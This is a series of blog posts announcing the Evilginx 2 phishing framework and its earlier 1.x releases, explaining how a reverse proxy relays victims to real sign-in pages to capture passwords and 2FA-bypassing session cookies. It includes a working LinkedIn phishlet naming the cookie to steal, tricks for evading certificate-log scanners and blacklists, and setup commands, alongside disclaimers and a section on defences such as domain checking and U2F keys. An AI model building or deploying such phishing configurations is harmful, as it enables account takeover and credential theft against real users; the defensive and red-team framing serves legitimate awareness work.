Evilginx 2 - Next Generation of Phishing 2FA Tokens

It's been over a year since the first release of Evilginx and, looking back, it has been an amazing year. I've received tons of feedback, got invited to WarCon by @antisnatchor (thanks man!) and met amazing people from the industry. A year ago, I wouldn't have expected that one day Kevin Mitnick would showcase Evilginx in his live demos around the world and TechCrunch would write about it!

At WarCon I met the legendary @evilsocket (he is a really nice guy), who inspired me with his ideas to learn GO and rewrite Evilginx as a standalone application. It is amazing how well GO suits offensive tools development, and bettercap is the best proof of it!

This is where Evilginx is now. No more nginx, just pure evil. My main goal with this tool's release was to focus on minimizing the installation difficulty and maximizing the ease of use. Usability was not necessarily the strongest point of the initial release.

Updated instructions on usage and installation can always be found up-to-date on the tool's official GitHub project page. In this blog post I only want to explain some general concepts of how it works and its major features.

Update: Check also version 2.1 release post

TL;DR What am I looking at?

Evilginx is an attack framework for setting up phishing pages. Instead of serving lookalike templates of sign-in pages, Evilginx becomes a relay between the real website and the phished user. The phished user interacts with the real website, while Evilginx captures all the data transmitted between the two parties.

Evilginx, being the man-in-the-middle, captures not only usernames and passwords, but also the authentication tokens sent as cookies. Captured authentication tokens allow the attacker to bypass any form of 2FA enabled on the user's account (except for U2F - more about that further below).

Even if the phished user has 2FA enabled, the attacker, outfitted with just a domain and a VPS server, is able to remotely take over their account. It doesn't matter if 2FA uses SMS codes, a mobile authenticator app or recovery keys.

Take a look at the video demonstration, showing how attackers can remotely hack an Outlook account with 2FA enabled.

Disclaimer: The Evilginx project is released for educational purposes and should be used only in demonstrations or legitimate penetration testing assignments, with written permission from the to-be-phished parties. The goal is to show that 2FA is not a silver bullet against phishing attempts, and that people should be aware their accounts can be compromised nonetheless if they are not careful.

[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)
**Remember - 2FA is not a silver bullet against phishing!**

2FA is very important, though. This is what the head of Google Threat Intelligence had to say on the subject:

2FA is super important but please, please stop telling people that by itself it will protect people from being phished by the Russians or governments. If attacker can trick users for a password, they can trick them for a 6 digit code.

— Shane Huntley (@ShaneHuntley) July 22, 2018

Old phishing tactics

The common phishing attacks we see every day are HTML templates, prepared as lookalikes of popular websites' sign-in pages, luring victims into disclosing their usernames and passwords. When the victim enters their username and password, the credentials are logged and the attack is considered a success.

I love digging through certificate transparency logs. Today, I saw a fake Google Drive landing page freshly registered with Let's Encrypt. It had a hardcoded picture/email of presumably the target. These can be a wealth of info that I recommend folks checking out. pic.twitter.com/PRweQsgHKD

— Justin Warner (@sixdub) July 22, 2018

This is where 2FA steps in. If the phished user has 2FA enabled on their account, the attacker needs an additional form of authentication to supplement the username and password intercepted through phishing. That additional factor may be an SMS code sent to the user's mobile device, a TOTP token, a PIN or an answer to a question that only the account owner knows. An attacker without access to any of these will never be able to successfully authenticate and log into the victim's account.

Old phishing methods which focus solely on capturing usernames and passwords are completely defeated by 2FA.

Phishing 2.0

What if it was possible to lure the victim not only into disclosing their username and password, but also into providing the answer to any 2FA challenge that comes after the credentials are verified? Intercepting a single 2FA answer would not do the attacker any good: the challenge changes with every login attempt, which makes this approach useless.

After each successful login, the website generates an authentication token for the user's session. This token (or multiple tokens) is sent to the web browser as a cookie and saved for future use. From that point, every request sent from the browser to the website will carry that session token as a cookie. This is how websites recognize authenticated users after successful authentication; they do not ask users to log in every time a page is reloaded.

This session token cookie is pure gold for the attacker. If you export cookies from your browser and import them into a different browser, on a different computer, in a different country, you will be authorized and get full access to the account, without being asked for usernames, passwords or 2FA tokens.

This is what it looks like, in Evilginx 2, when session token cookie is successfully captured:
[screenshot: a captured session token cookie]

Now that we know how valuable the session cookie is, how can the attacker intercept it remotely, without having physical access to the victim's computer?

Common phishing attacks rely on creating HTML templates, which take time to make. Most of the work is spent on making them look good, responsive on mobile devices, and properly obfuscated to evade phishing detection scanners.


Evilginx takes the attack one step further: instead of serving its own HTML lookalike pages, it becomes a web proxy. Every packet coming from the victim's browser is intercepted, modified and forwarded to the real website. The same happens with response packets coming from the website; they are intercepted, modified and sent back to the victim. With Evilginx there is no need to create your own HTML templates. On the victim's side everything looks as if they were communicating with the legitimate website. The user has no idea that Evilginx sits as a man-in-the-middle, analyzing every packet and logging usernames, passwords and, of course, session cookies.

You may ask now: what about the encrypted HTTPS connection using SSL/TLS that prevents eavesdropping on the communication? Good question. The problem is that the victim is only talking, over HTTPS, to the Evilginx server and not to the true website itself. Evilginx establishes its own HTTPS connection with the victim (using its own SSL/TLS certificates), receives and decrypts the packets, then acts as a client itself and establishes its own HTTPS connection with the destination website, where it sends the re-encrypted packets as if it were the victim's browser. This is how the trust chain is broken, and the victim still sees the green lock icon next to the address bar, thinking that everything is safe.

When the victim enters their credentials and is asked to provide a 2FA challenge answer, they are still talking to the real website, with Evilginx relaying the packets back and forth, sitting in the middle. Even while being phished, the victim will still receive the 2FA SMS code on their mobile phone, because they are talking to the real website (just through a relay).


After the 2FA challenge is completed by the victim and the website confirms its validity, the website generates the session token, which it returns in the form of a cookie. This cookie is intercepted by Evilginx and saved. Evilginx determines that authentication was a success and redirects the victim to whatever URL it was set up with (an online document, a video etc.).

At this point the attacker holds all the keys to the castle and is able to use the victim's account, fully bypassing 2FA protection, after importing the session token cookies into their own web browser.

Be aware: every sign-in page that requires the user to provide their password, with any form of 2FA implemented, can be phished using this technique!

How to protect yourself?

There is one major flaw in this phishing technique that anyone can and should exploit to protect themselves - the attacker must register their own domain.

When registering a domain, the attacker will try to make it look as similar to the real, legitimate domain as possible. For example, if the attacker is targeting Facebook (real domain facebook.com), they can register a domain like faceboook.com or faceb00k.com, maximizing the chance that phished victims won't spot the difference in the browser's address bar.

That said - always check the legitimacy of the website's base domain, visible in the address bar, if it asks you to provide any private information. By base domain I mean the one that directly precedes the top-level domain.


As an example, imagine the website you arrived at has this URL and asks you to log into Facebook:

https://en-gb.facebook.cdn.global.faceboook.com/login.php

The top-level domain is .com and the base domain is the word directly preceding it, with the next . as a separator. Combined with the TLD, that gives faceboook.com. Once you verify that faceboook.com is not the real facebook.com, you will know that someone is trying to phish you.

As a side note - the green lock icon seen next to the URL in the browser's address bar does not mean that you are safe!

The green lock icon only means that the website you've arrived at encrypts the transmission between you and the server, so that no one can eavesdrop on your communication. Attackers can easily obtain SSL/TLS certificates for their phishing sites and display the green lock icon as well, giving you a false sense of security.

Figuring out whether the base domain you see is valid is sometimes not easy and leaves room for error. It became even harder with the support for Unicode characters in domain names. This made it possible for attackers to register domains with special characters (e.g. in Cyrillic) that are lookalikes of their Latin counterparts. This technique became known as a homograph attack.

As a quick example, an attacker could register the domain facebooĸ.com, which looks pretty convincing even though it is a completely different domain name (ĸ is not really k). It gets even worse with other Cyrillic characters, allowing for ebаy.com vs ebay.com - the first one substitutes a Cyrillic counterpart for one character, which looks exactly the same.

Major browsers were fast to address the problem and added special filters to prevent domain names from being displayed in Unicode when suspicious characters are detected.

If you are interested in how it works, check out the IDN spoofing filter source code of the Chrome browser.

Now you see that verifying domains visually is not always the best solution, especially for big companies, where it often takes just one phished employee to let attackers steal vast amounts of data.

This is why FIDO Alliance introduced U2F (Universal 2nd Factor Authentication) to allow for unphishable 2nd factor authentication.

In short, you have a physical hardware key on which you just press a button when the website asks you to. Additionally, it may ask you for the account password or a complementary 4-digit PIN. The website talks directly with the hardware key plugged into your USB port, with the web browser as the communication channel.


What is different about this form of authentication is that the U2F protocol is designed to take the website's domain as one of the key components in negotiating the handshake. This means that if the domain in the browser's address bar does not match the domain used in the data transmission between the website and the U2F device, the communication will simply fail. This solution leaves no room for error and is totally unphishable using the Evilginx method.

Citing the vendor of U2F devices - Yubico (who co-developed U2F with Google):

With the YubiKey, user login is bound to the origin, meaning that only the real site can authenticate with the key. The authentication will fail on the fake site even if the user was fooled into thinking it was real. This greatly mitigates against the increasing volume and sophistication of phishing attacks and stops account takeovers.

It is important to note here that Markus Vervier (@marver) and Michele Orrù (@antisnatchor) did demonstrate a technique for attacking U2F devices using the newly implemented WebUSB feature in modern browsers (which allows websites to talk to USB-connected devices). It is also important to mention that Yubico, the creator of the popular U2F devices YubiKeys, tried to steal credit for their research, which they later apologized for.

You can find the list of all websites supporting U2F authentication here.

Coinciding with the release of Evilginx 2, WebAuthn is coming out in all major web browsers. It will introduce the new FIDO2 password-less authentication standard to every browser. Chrome, Firefox and Edge are about to receive full support for it.

To wrap up - if you often need to log into various services, make your life easier and get a U2F device! This will greatly improve your accounts' security.

Under the hood

Interception of HTTP packets is possible because Evilginx acts as an HTTP server talking to the victim's browser and, at the same time, as an HTTP client for the website the data is being relayed to. To make this possible, the victim has to contact the Evilginx server through a custom phishing URL pointing to it. Simply forwarding packets from the victim to the destination website would not work well, which is why Evilginx has to make some on-the-fly modifications.

In order for the phishing experience to be seamless, the proxy overcomes the following obstacles:

1. Making sure that the victim is not redirected to the phished website's true domain.

Since the phishing domain differs from the legitimate domain used by the phished website, relayed scripts and HTML data have to be carefully modified to prevent unwanted redirection of the victim's web browser. There will be HTML submit forms pointing to legitimate URLs, scripts making AJAX requests and JSON objects containing URLs.

Ideally, the most reliable way to solve this would be to perform a regular expression string substitution for every occurrence of https://legit-site.com, replacing it with https://our-phishing-site.com. Unfortunately, it's not always that simple, and it requires some trial-and-error kung-fu, working with the web inspector to track down all the strings the proxy needs to replace so as not to break the website's functionality. If the target website offers multiple options for 2FA, each route has to be inspected and analyzed.

For example, there are JSON objects transporting escaped URLs like https:\/\/legit-site.com. You can see that this will definitely not trigger the regexp mentioned above. And if you blindly replaced all occurrences of legit-site.com, you might break something by accident.
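As an illustration, a hypothetical sub_filter targeting that escaped form specifically could look like this, using the phishlet fields described in the Phishlets section below (the exact escaping is my assumption and needs verifying against the target site):

sub_filters:
  # matches the literal text 'https:\/\/legit-site.com' inside JSON responses only
  - {hostname: 'legit-site.com', sub: '', domain: 'legit-site.com', search: 'https:\\/\\/{hostname_regexp}', replace: 'https:\/\/{hostname}', mimes: ['application/json']}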

2. Responding to DNS requests for multiple subdomains.

Websites will often make requests to multiple subdomains under their official domain or even use a totally different domain. In order to proxy these transmissions, Evilginx has to map each of the custom subdomains to its own IP address.

Previous versions of Evilginx required the user to set up their own DNS server (e.g. bind) and configure DNS zones to properly handle DNS A requests. This generated a lot of headaches on the user's part and was only easier if the hosting provider (like Digital Ocean) offered an easy-to-use admin panel for setting up DNS zones.

With Evilginx 2 this issue is gone. Evilginx now runs its own in-built DNS server, listening on port 53, which acts as a nameserver for your domain. All you need to do is set up the nameserver addresses for your domain (ns1.yourdomain.com and ns2.yourdomain.com) to point to your Evilginx server IP, in the admin panel of your domain hosting provider. Evilginx will handle the rest on its own.

3. Modification of various HTTP headers.

Evilginx modifies HTTP headers sent to and received from the destination website. In particular, the Origin header in AJAX requests will always hold the URL of the requesting site, in order to comply with CORS. A phishing site would send a phishing URL as the origin; when the request is forwarded, the destination website would receive an invalid origin and refuse to respond to it. Not replacing the phishing hostname with the legitimate one in the request would also make it easy for the website to notice suspicious behavior. Evilginx automatically rewrites the Origin and Referer fields on-the-fly to their legitimate counterparts.
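For example, a request header arriving from the victim's browser as:

Origin: https://our-phishing-site.com

is rewritten before forwarding to:

Origin: https://legit-site.com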

In the same way, to avoid CORS conflicts from the other side, Evilginx sets the Access-Control-Allow-Origin header value to * (if it exists in the response) and removes any occurrences of Content-Security-Policy headers. This guarantees that no request will be restricted by the browser when AJAX requests are made.

Another header to modify is Location, which is set in HTTP 301 and 302 responses to redirect the browser to a different location. Naturally, its value will contain a legitimate website URL, and Evilginx makes sure this location is properly switched to the corresponding phishing hostname.
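For example, a redirect sent by the real website as:

Location: https://legit-site.com/home

reaches the victim's browser as:

Location: https://our-phishing-site.com/home

(the /home path is only an illustration).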

4. Cookie filtering.

It is common for websites to manage cookies for various purposes. Each cookie is assigned to a specific domain, and the web browser's task is to automatically send the stored cookie with every request to the domain the cookie was assigned to. Cookies are also sent as HTTP headers, but I decided to mention them separately here, due to their importance. An example cookie sent from the website to the client's web browser looks like this:

Set-Cookie: qwerty=219ffwef9w0f; Domain=legit-site.com; Path=/; Expires=Wed, 30 Aug 2019 00:00:00 GMT

As you can see, the cookie will be set in the client's web browser for the legit-site.com domain. Since the phishing victim is only talking to the phishing website at domain our-phishing-site.com, such a cookie will never be saved in the browser, because the cookie domain differs from the one the browser is communicating with. Evilginx will parse every occurrence of Set-Cookie in HTTP response headers and modify the domain, replacing it with the phishing one, as follows:

Set-Cookie: qwerty=219ffwef9w0f; Domain=our-phishing-site.com; Path=/;

Evilginx will also remove the expiration date from cookies, unless the expiration date indicates that the cookie should be deleted from the browser's cache.

Evilginx also sends its own cookies to manage the victim's session. These cookies are filtered out from every HTTP request, to prevent them from being sent to the destination website.

5. SSL splitting.

As the whole world-wide-web migrates to serving pages over secure HTTPS connections, phishing pages can't lag behind. Whenever you pick a hostname for your phishing page (e.g. totally.not.fake.linkedin.our-phishing-domain.com), Evilginx will automatically obtain a valid SSL/TLS certificate from LetsEncrypt, providing responses to ACME challenges using the in-built HTTP server.

This makes sure that victims will always see a green lock icon next to the URL address bar, when visiting the phishing page, comforting them that everything is secured using "military-grade" encryption!

6. Anti-phishing tricks

There are rare cases where websites employ defenses against being proxied. One such defense I uncovered during testing is javascript that checks whether window.location contains the legitimate domain. These detections may be easy or hard to spot, and much harder to remove if additional code obfuscation is involved.

Improvements

The greatest advantage of Evilginx 2 is that it is now a standalone console application. There is no need to compile and install a custom version of nginx, which I admit was not a simple feat. I am sure that abusing nginx site configs and the proxy_pass feature for phishing purposes was not what the HTTP server's developers had in mind when developing the software.


Evilginx 1 was pretty much a combination of several dirty hacks, duct taped together. Nonetheless it somehow worked!

In addition to the fully responsive console UI, here are the greatest improvements:

Tokenized phishing URLs

In the previous version of Evilginx, entering just the hostname of your phishing URL in the browser, with the root path (e.g. https://totally.not.fake.linkedin.our-phishing-domain.com/), would still proxy the connection to the legitimate website. This turned out to be an issue, as I found out during development of Evilginx 2. Apparently, once you obtain SSL/TLS certificates for the domain/hostname of your choice, external scanners start scanning your domain. Scanners gonna scan.

The scanners use public certificate transparency logs to monitor, in real-time, all domains that obtain valid SSL/TLS certificates. With public libraries like CertStream, you can easily create your own scanner.


For some phishing pages, it usually took about an hour for the hostname to get banned and blacklisted by popular anti-spam filters like Spamhaus. After I had three hostnames blacklisted for one domain, the whole domain got blocked. Three strikes and you're out!

I began thinking about how such detection could be evaded. The easiest solution was to reply with a faked response to every request for the path /, but that would not work if scanners probed any other path.

Then I decided that each phishing URL generated by Evilginx should carry a unique token as a GET parameter.

For example, Evilginx responds with a redirection when a scanner makes a request to this URL:

https://totally.not.fake.linkedin.our-phishing-domain.com/auth/signin

But it responds with the proxied phishing page instead when the URL is properly tokenized with a valid token:

https://totally.not.fake.linkedin.our-phishing-domain.com/auth/signin?tk=secret_l33t_token

When a tokenized URL is opened, Evilginx sets a validation cookie in the victim's browser, whitelisting all subsequent requests, even non-tokenized ones.

This works very well, but there is still a risk that scanners will eventually scan tokenized phishing URLs once these get out into the interwebz.

Hiding your phishlets

This thought prompted me to find a solution that allows manual control over when the phishing proxy should respond with the proxied website and when it should not. As a result, you can hide and unhide the phishing page whenever you want. A hidden phishing page will respond with a 302 HTTP redirect, sending the requester to a predefined URL (Rick Astley's famous clip on Youtube is the default).

Temporarily hiding your phishlet may be useful when you want to use a URL shortener (like goo.gl or bit.ly) to shorten your phishing URL, or when you are sending the phishing URL via email and don't want to trigger any email scanners on the way.

Phishlets

Phishlets are the new site configs. They are plain-text ruleset files, in YAML format, which are fed into the Evilginx engine. Phishlets define which subdomains are needed to properly proxy a specific website, what strings should be replaced in relayed packets and which cookies should be captured, to properly take over the victim's account. There is one phishlet for each phished website. You can deploy as many phishlets as you want, each set up for a different website. Phishlets can be enabled and disabled as you please, and Evilginx can run and manage any number of them at any time.

I will do a better job than I did last time, when I released Evilginx 1, and try to explain the structure of a phishlet, giving you a brief insight into how phishlets are created (I promise to release a separate blog post about it later!).

I will dissect the LinkedIn phishlet for the purpose of this short guide:

name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
  - {
      phish_sub: 'www',
      orig_sub: 'www',
      domain: 'linkedin.com',
      session: true,
      is_landing: true
    }
sub_filters:
  - {
      hostname: 'www.linkedin.com',
      sub: 'www',
      domain: 'linkedin.com',
      search: 'action="https://{hostname}',
      replace: 'action="https://{hostname}',
      mimes: ['text/html', 'application/json']
    }
  - {
      hostname: 'www.linkedin.com',
      sub: 'www',
      domain: 'linkedin.com',
      search: 'href="https://{hostname}',
      replace: 'href="https://{hostname}',
      mimes: ['text/html', 'application/json']
    }
  - {
      hostname: 'www.linkedin.com',
      sub: 'www',
      domain: 'linkedin.com',
      search: '//{hostname}/nhome/',
      replace: '//{hostname}/nhome/',
      mimes: ['text/html', 'application/json']
    }
auth_tokens:
  - domain: 'www.linkedin.com'
    keys: ['li_at']
user_regex:
  key: 'session_key'
  re: '(.*)'
pass_regex:
  key: 'session_password'
  re: '(.*)'
landing_path:
  - '/uas/login'

First things first. I advise you to get familiar with YAML syntax to avoid any errors when editing or creating your own phishlets.

Starting off with the simple and rather self-explanatory variables: name is the name of the phishlet, which would usually be the name of the phished website. author is where you can do some self-promotion - this will be visible in Evilginx's UI when the phishlet is loaded. min_ver is currently not enforced, but will very likely be used when the phishlet format changes in future releases of Evilginx, to provide a way of checking a phishlet's compatibility with the current version of the tool.

Following that, we have proxy_hosts. This array holds the sub-domains that Evilginx will manage. It lists all the hostnames for which you want to intercept the transmission, giving you the capability to make on-the-fly packet modifications.

  • phish_sub : the subdomain name that will be prefixed to the phishlet's hostname. I advise leaving it the same as the original subdomain name, due to issues that may arise with string replacements later, as supporting custom subdomain names often requires additional work.
  • orig_sub : the original subdomain name as used on the legitimate website.
  • domain : the website's domain that we are targeting.
  • session : set this to true ONLY for subdomains that will return authentication cookies. This indicates which subdomain Evilginx should recognize as the one that initiates the creation of an Evilginx session, and sets the Evilginx session cookie for this entry's domain name.
  • is_landing : set this to true if you want this subdomain to be used in the generation of phishing URLs later.

In the LinkedIn example, we only need to support one subdomain: www. The phishing hostname for this subdomain will then be www.totally.not.fake.linkedin.our-phishing-domain.com.

Next are sub_filters, which tell Evilginx all about string substitution magics.

  • hostname : the original hostname of the website for which the substitution will take place.
  • sub : the subdomain name from the original hostname. This will only be used as a helper string in substitutions, which I explain below.
  • domain : the domain name of the original hostname. Same as sub - used as a helper string in substitutions.
  • search : the regular expression of what to search for in the HTTP packet's body. You can use some {...} variables that Evilginx will prefill for you; I've listed all supported variables below.
  • replace : the string that will replace all occurrences of search matches. The {...} variables are also supported here.
  • mimes : an array of MIME types to consider before doing the search and replace. One of these MIME types must show up in the Content-Type header of the HTTP response before Evilginx considers doing any substitutions for that packet. The most common MIME types to use here are: text/html, application/json, application/javascript or text/javascript.
  • redirect_only : use this sub_filter only if a redirection URL is set in the generated phishing URL (true or false).

The following is a list of bracket variables that you can use in search and replace parameters:

  • {hostname} : a combination of the subdomain, defined by the sub parameter, and the domain, defined by the domain parameter. In the search field it translates to the original website's hostname (e.g. www.linkedin.com). In the replace field, it translates to the corresponding phishing hostname of the matching proxy_hosts entry (e.g. www.totally.not.fake.linkedin.our-phishing-domain.com).
  • {subdomain} : same as {hostname}, but only for the subdomain.
  • {domain} : same as {hostname}, but only for the domain.
  • {domain_regexp} : same as {domain}, but translates to a properly escaped regular expression string. This can be useful when replacing anti-phishing protections in javascript that try to verify whether window.location contains the legitimate domain.
  • {hostname_regexp} : same as above, but for the hostname.
  • {subdomain_regexp} : same as above, but for the subdomain.

In the example we have:

  - {
      hostname: 'www.linkedin.com',
      sub: 'www',
      domain: 'linkedin.com',
      search: 'action="https://{hostname}',
      replace: 'action="https://{hostname}',
      mimes: ['text/html', 'application/json']
    }

This will make Evilginx search for packets with a Content-Type of text/html or application/json and look for occurrences of action="https://www\.linkedin\.com (a properly escaped regexp). If found, every occurrence will be replaced with action="https://www.totally.not.fake.linkedin.our-phishing-domain.com.

As you can see, this will replace the action URL of the login HTML form to have it point to the Evilginx server, so that the victim does not stray off the phishing path.

That was the most complicated part. The rest should be pretty straightforward.

Next up are the auth_tokens. This is where you define the cookies that should be captured on successful login, which combined together represent the full state of the website's captured session. The cookies defined here, once obtained, can later be imported into any browser (using this extension in Chrome), immediately logging you into the victim's account and bypassing any 2FA challenges.

  • domain : the original domain the cookies will be saved for.
  • keys : an array of cookie names that should be captured.

In the example, there is only one cookie that LinkedIn uses to verify the session's state: the li_at cookie, saved for the www.linkedin.com domain, will be captured and stored.

Once Evilginx captures all of the defined cookies, it will display a message that authentication was successful and will store them in the database.

The two following parameters, user_regex and pass_regex, are similar. These define the POST request keys that should be searched for occurrences of usernames and passwords. The search is defined by a regular expression that is run against the contents of the POST request's key value.

  • key : the name of the POST request key.
  • re : a regular expression defining what data should be captured from the key's value (e.g. (.*) captures the whole value).

The last parameter is the landing_path array, which holds the URL paths of the phished website's login pages (usually just one).

In our example, there is /uas/login, which translates to https://www.totally.not.fake.linkedin.our-phishing-domain.com/uas/login in the generated phishing URL.

Hope that sheds some light on how you can create your own phishlets and helps you understand the ones that are already shipped with Evilginx in the ./phishlets directory.

Future development

I'd like to continue working on Evilginx 2 and there are some things I have in mind that I want to eventually implement.

One of those things is serving an HTML page instead of a 302 redirect for hidden phishlets. This could be a page imitating CloudFlare's "checking your browser", waiting in a loop and redirecting to the phishing page as soon as you unhide your phishlet.


Another thing I want at some point is to have Evilginx launch as a daemon, without the UI.

Update: You can find out about version 2.1 release here

Business Inquiries

If you are a red teaming company interested in development of custom phishing solutions, drop me a line and I will be happy to assist in any way I can.

If you are giving presentations on flaws of 2FA and/or promoting the use of FIDO U2F/FIDO2 devices, I'd love to hear how Evilginx can help you raise awareness.

In any case, send me an email at: [email protected]

I'll respond as soon as I can!

Credits

Since the release of Evilginx 1, in April last year, a lot has changed in my life for the better. I met a lot of wonderful, talented people, in front of whom I could exercise my impostor syndrome!

I'd like to thank a few people without whom this release would not have been possible:

@evilsocket - for letting me know that Evilginx is awesome, inspiring me to learn GO and for developing so many incredible products that I could ~~steal~~ borrow code from!

@antisnatchor and @h0wlu - for organizing WarCon and for inviting me!

@juliocesarfort and @Mario_Vilas - for organizing AlligatorCon and for being great reptiles!

@x33fcon - for organizing x33fcon and letting me do all these lightning talks!

Vincent Yiu (@vysecurity) - for all the red tips and invitations to secret security gatherings!

Kevin Mitnick (@kevinmitnick) - for giving Evilginx a try and making me realize its importance!

@i_bo0om - for giving me an idea to play with nginx's proxy_pass feature in his post.

Cristofaro Mune (@pulsoid) & Denis Laskov (@it4sec) - for spending their precious time to hear out my concerns about releasing such tool to the public.

Giuseppe "Ohpe" Trotta (@Giutro) - for a heads up that there may be other similar tools lurking around in the darkness ;)

#apt - everyone I met there, for sharing amazing contributions.

**Thank you!**

That's it! Thanks for making it through this overly long post!
Enjoy the tool and I'm waiting for your feedback!
[Follow me on Twitter](https://twitter.com/mrgretzky)
[Download Evilginx 2 from GitHub](https://github.com/kgretzky/evilginx2)

Evilginx 1.1 Release

Hello! Today I am bringing you another release of Evilginx, with more bug fixes and added features. Development is going very well and the feedback from you has been terrific. I've managed to address most of the requests you sent me on GitHub and I hope to address even more in the future.

If you don't know what Evilginx is, feel free to check out the first post, where I explain the subject in detail.

You can go straight to the Evilginx project page on GitHub here:
[Evilginx 1.1 on GitHub](https://github.com/kgretzky/evilginx)

Disclaimer

I am aware that Evilginx can be used for very nefarious purposes. This work is merely a demonstration of what adept attackers can and will do. It is the defender's responsibility to take such attacks into consideration when setting up defenses, and to find ways to protect against this phishing method.

Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.


Version 1.1

Here is the list of the biggest improvements in version 1.1:

iCloud.com support

A new site config was added that allows proxying the login process of the iCloud page. This one also performs some on-the-fly modification of Javascript content to disable several domain verifications. By far, this site config was the hardest to develop.

Live.com support

A site config for the Outlook/Hotmail page was added. It is fairly simple and should serve as a good reference for creating your own templates.

Added support for custom SSL/TLS certificates

If you don't want to use LetsEncrypt SSL/TLS certificates, you can now specify your own public certificates and private keys when enabling the site config:

./evilginx.py setup --enable <site_name> -d <domain> --crt <path_to_public_cert_file> --key <path_to_private_key_file>

Evilginx will remember your site options

You don't have to specify the domain name or certificate paths every time you want to update your site config using the --enable parameter. If the site config was previously enabled and set up, its options will be stored in the .config file. All you need to do is enable the site config:

./evilginx.py setup --enable <site_name>

Added script that updates Nginx configuration files

From now on, after every update of Evilginx, you should execute the ./update.sh script, which will make sure your Nginx configuration files are up to date. Fixes were made in this version to allow the web server to receive big upstream responses and to support long hostnames (you can now specify a very long chain of subdomains for your phishing hostnames).

Fixed rare issue with parsing requests from log files

There was a known issue, specific to the Google site config. If the user entered their email address into the form in the 1st step of the login process and, shortly after, the parsing script launched (by default it launches every minute) and truncated the log file, the intercepted email address would be lost forever, just before the user was about to enter their password.
The issue was fixed by leaving behind in the log file, for the next parser execution, custom information with the last known parsed email for a specific IP address.

How to update?

You can always find the latest version of Evilginx on GitHub:
[Evilginx 1.1 on GitHub](https://github.com/kgretzky/evilginx)

# pull latest changes from GitHub
git pull
# run update script to make sure your Nginx configuration files are up-to-date
./update.sh
# re-enable every site config you may have been using to update them to their latest versions
./evilginx.py setup --enable <site_name>

Changelog

[+] Added iCloud.com support.
[+] Added Live.com support.
[+] Specifying domain name with 'setup --enable' is now optional if site was enabled before.
[+] Added ability to specify custom SSL/TLS certificates with --crt and --key arguments.
    Custom certificates will be remembered and can be removed with --use_letsencrypt parameter.
[+] Added 'server_names_hash_bucket_size: 128' to support long hostnames.
[+] Fixed rare issue, which could be triggered when only visitor's email was identified at the time
    of truncating logs, after parsing, breaking the chain of logged requests, which would miss an
    email address on next parse.
[+] Fixed several typos in site config files. (@poweroftrue)
[+] Fixed issue with Nginx proxy bailing out on receiving too big upstream responses.
[+] Fixed issue with Facebook overwriting redirection cookie with 'deleted' (@poweroftrue)
[+] Fixed "speedbump" redirection for Google site config that asks user to provide his phone number.
[+] Fixed bug that would raise exception when disabling site configs without them being enabled first.
[+] Nginx access_log directory can now be changed with VAR_LOGS constant in evilginx.py.
[+] Added 'update.sh' file which should be executed after every 'git pull' to update nginx config files.
[+] Added Dockerfile

Epilogue

I have added a development branch on GitHub where you can monitor all the latest changes. I make sure this branch is as stable as it can get, but minor bugs may still appear before they are put to rest. If you have any pull requests of your own, please make sure to apply them to this branch.

Development branch can be found here:
Evilginx development branch

If you have any suggestions, ideas or feedback, make sure to post them in the comments section, but it is even better to post them under issues on GitHub.

I am constantly looking for interesting projects to work on!

Do not hesitate to contact me if you happen to be working on projects that require:

  • Reverse Engineering
  • Development of Security Software
  • Web / Mobile Application Penetration Testing
  • Offensive Tools for Red Team Assessments

Hit me up on Twitter @mrgretzky or directly via e-mail at [email protected].

Enjoy and see you soon!

Evilginx 1.0 Update - Up Your Game in 2FA Phishing

Welcome back! It's been just a couple of weeks since Evilginx release and I'm already swimming in amazing feedback. This encouraged me to spend more time on this project and make it better. The first release was more of a proof of concept, but now I want to make it a full-blown framework, which is going to be easily expandable. In other words, Evilginx is getting modular architecture, easy installation and support for lots of new site templates.

If you want to learn more about Evilginx and how it works, please refer to the previous post, which you can find here.

Looking just for the tool? You can always find it on GitHub at its most current version:
https://github.com/kgretzky/evilginx

Disclaimer: This project is released for educational purposes and should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

Evilginx v.1.0 release

This week I'm releasing the product of several weeks of work: the official 1.0 release. I've redone some of the code and put the whole of Evilginx's functionality into a single script file. The directory structure was reorganized to better fit the modular architecture. From now on, site config templates, creds config files and additional config files are organized into separate directories. It should now be easy to add your own templates just by creating a new directory in the sites directory and populating it with the necessary config files. Evilginx will automatically detect a site config's presence by scanning the directory.

To summarize, here is the list of major additions and fixes:

New site config template system

As mentioned above, the new system makes it very easy to organize site templates and create new ones. All templates should be placed in separate directories under the sites directory.
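Based on the site listing shown later in this post, the resulting directory layout looks roughly like this (a sketch - only the config files are shown):

sites/
  dropbox/
    config
  facebook/
    config
  google/
    config
  linkedin/
    config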

One-shot fire & forget installation script (Debian only)

No more will you have to perform tedious manual work like compiling OpenResty, setting up the Nginx daemon and gluing all the parts together. From now on, the whole Evilginx package can be installed by simply executing the install.sh script, which you can find in the project's root directory.

Evilginx.py script to setup, parse logs and generate URLs

In the root directory you will find the evilginx.py script, which, from now on, will act as the command center. It will install/uninstall the site configs that you want to enable/disable in Nginx. It will parse the logs, harvesting login credentials and session cookies, and put them into a separate logs directory. It will also generate phishing URLs for you with a specified redirection URL, which is now base64 encoded to make it less obvious.

The script, when enabling site templates, will even let you set up log parsing to launch every minute. Additionally, it does the hard job of obtaining LetsEncrypt SSL/TLS certificates for you and renews them automatically, keeping them valid for eternity.

New site templates for popular websites

In order to figure out and introduce the structure for the modular architecture, I had to create several new templates for new sites. This allowed me to design the base of every template as the foundation of the new template system.

Here is the list of new site config templates, which were introduced with this release:

  • Facebook
  • Dropbox
  • Linkedin
  • New Google sign-in page

While preparing these, I encountered several obstacles that I had to overcome with custom bypasses in LUA code.

Dropbox, for example, had an anti-CSRF protection that required the t POST parameter to have the same value as the t cookie sent with the same POST request. The POST t value was not set automatically by the javascript code if the site's URL differed from dropbox.com, and that had to be fixed with custom LUA code.

Facebook uses two versions of their site - one for desktop and one for mobile. If a mobile device is detected, the user is redirected to the m.facebook.com domain, which had to be proxied by adding an additional site config file.

The new Google sign-in page retrieves external javascript files from the ssl.gstatic.com domain, which had to be proxied separately. Otherwise no data was retrieved from that domain, due to strict Access-Control-Allow-Origin rules that disallow requests from domains not recognized by Google.

If you are interested in creating your own site templates, you may find the included ones very helpful in analyzing how to bypass possible issues you may encounter.


Here is the full CHANGELOG:

version 1.0 :
[+] Created central script for handling setup, parsing and generating urls.
